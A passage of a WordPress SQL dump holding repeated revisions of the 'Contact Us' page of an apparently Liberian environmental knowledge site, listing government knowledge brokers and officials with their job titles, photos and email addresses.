href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 14:31:54','2021-01-18 14:31:54','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3371,42,'2021-01-18 14:37:48','2021-01-18 14:37:48','','','','inherit','open','closed','','jallah','','','2021-01-18 14:37:56','2021-01-18 14:37:56','',80,'https://ekmsliberia.info/wp-content/uploads/2021/01/jallah.png',0,'attachment','image/png',0),(3372,42,'2021-01-18 14:38:39','2021-01-18 14:38:39','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"mr wesseh\" alt=\"mr wesseh\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 14:38:39','2021-01-18 14:38:39','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3373,42,'2021-01-18 14:38:39','2021-01-18 14:38:39','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"mr wesseh\" alt=\"mr wesseh\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 14:38:39','2021-01-18 14:38:39','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3374,42,'2021-01-18 14:38:40','2021-01-18 14:38:40','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"mr wesseh\" alt=\"mr wesseh\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" 